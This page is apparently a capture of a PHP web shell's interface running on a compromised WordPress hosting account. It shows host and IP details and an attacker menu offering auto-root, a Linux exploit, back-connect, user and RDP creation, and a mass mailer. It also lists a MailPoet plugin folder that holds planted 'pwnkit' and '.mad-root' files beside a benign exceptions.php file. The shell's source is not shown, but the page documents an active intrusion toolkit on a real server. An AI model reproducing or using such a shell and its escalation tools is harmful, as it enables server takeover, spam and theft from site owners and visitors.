Linux webm014.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.130.20.14 | : 216.73.216.242
Cant Read [ /etc/named.conf ]
7.4.33
hsesolc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
hsesolc /
www /
wp-content /
plugins /
mailpoet /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
API
[ DIR ]
drwxr-xr-x
AdminPages
[ DIR ]
drwxr-xr-x
Analytics
[ DIR ]
drwxr-xr-x
AutomaticEmails
[ DIR ]
drwxr-xr-x
Automation
[ DIR ]
drwxr-xr-x
Cache
[ DIR ]
drwxr-xr-x
Config
[ DIR ]
drwxr-xr-x
Cron
[ DIR ]
drwxr-xr-x
CustomFields
[ DIR ]
drwxr-xr-x
DI
[ DIR ]
drwxr-xr-x
Doctrine
[ DIR ]
drwxr-xr-x
Entities
[ DIR ]
drwxr-xr-x
Features
[ DIR ]
drwxr-xr-x
Form
[ DIR ]
drwxr-xr-x
Helpscout
[ DIR ]
drwxr-xr-x
Listing
[ DIR ]
drwxr-xr-x
Logging
[ DIR ]
drwxr-xr-x
Mailer
[ DIR ]
drwxr-xr-x
Models
[ DIR ]
drwxr-xr-x
Newsletter
[ DIR ]
drwxr-xr-x
NewsletterTemplates
[ DIR ]
drwxr-xr-x
PostEditorBlocks
[ DIR ]
drwxr-xr-x
Referrals
[ DIR ]
drwxr-xr-x
Router
[ DIR ]
drwxr-xr-x
Segments
[ DIR ]
drwxr-xr-x
Services
[ DIR ]
drwxr-xr-x
Settings
[ DIR ]
drwxr-xr-x
Statistics
[ DIR ]
drwxr-xr-x
Subscribers
[ DIR ]
drwxr-xr-x
Subscription
[ DIR ]
drwxr-xr-x
Tags
[ DIR ]
drwxr-xr-x
Tasks
[ DIR ]
drwxr-xr-x
Twig
[ DIR ]
drwxr-xr-x
Util
[ DIR ]
drwxr-xr-x
Validator
[ DIR ]
drwxr-xr-x
WP
[ DIR ]
drwxr-xr-x
WooCommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
exceptions.php
2.53
KB
-rw-r--r--
index.php
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exceptions.php
<?php declare(strict_types = 1); // phpcs:ignoreFile PSR1.Classes.ClassDeclaration namespace MailPoet; if (!defined('ABSPATH')) exit; /** * Provides information for converting exceptions to HTTP responses. */ interface HttpAwareException { public function getHttpStatusCode(): int; } /** * Frames all MailPoet exceptions ("$e instanceof MailPoet\Exception"). */ abstract class Exception extends \Exception { /** @var string[] */ private $errors = []; final public function __construct($message = '', $code = 0, \Throwable $previous = null) { parent::__construct($message, $code, $previous); } /** @return static */ public static function create(\Throwable $previous = null) { return new static('', 0, $previous); } /** @return static */ public function withMessage(string $message) { $this->message = $message; return $this; } /** @return static */ public function withCode(int $code) { $this->code = $code; return $this; } /** @return static */ public function withErrors(array $errors) { $this->errors = $errors; return $this; } public function getErrors(): array { return $this->errors; } } /** * USE: Generic runtime error. When possible, use a more specific exception instead. * API: 500 Server Error (not HTTP-aware) */ class RuntimeException extends Exception {} /** * USE: When wrong data VALUE is received. * API: 400 Bad Request */ class UnexpectedValueException extends RuntimeException implements HttpAwareException { public function getHttpStatusCode(): int { return 400; } } /** * USE: When an action is forbidden for given actor (although generally valid). * API: 403 Forbidden */ class AccessDeniedException extends UnexpectedValueException implements HttpAwareException { public function getHttpStatusCode(): int { return 403; } } /** * USE: When the main resource we're interested in doesn't exist. * API: 404 Not Found */ class NotFoundException extends UnexpectedValueException implements HttpAwareException { public function getHttpStatusCode(): int { return 404; } } /** * USE: When the main action produces conflict (i.e. duplicate key). * API: 409 Conflict */ class ConflictException extends UnexpectedValueException implements HttpAwareException { public function getHttpStatusCode(): int { return 409; } } /** * USE: An application state that should not occur. Can be subclassed for feature-specific exceptions. * API: 500 Server Error (not HTTP-aware) */ class InvalidStateException extends RuntimeException {}
Close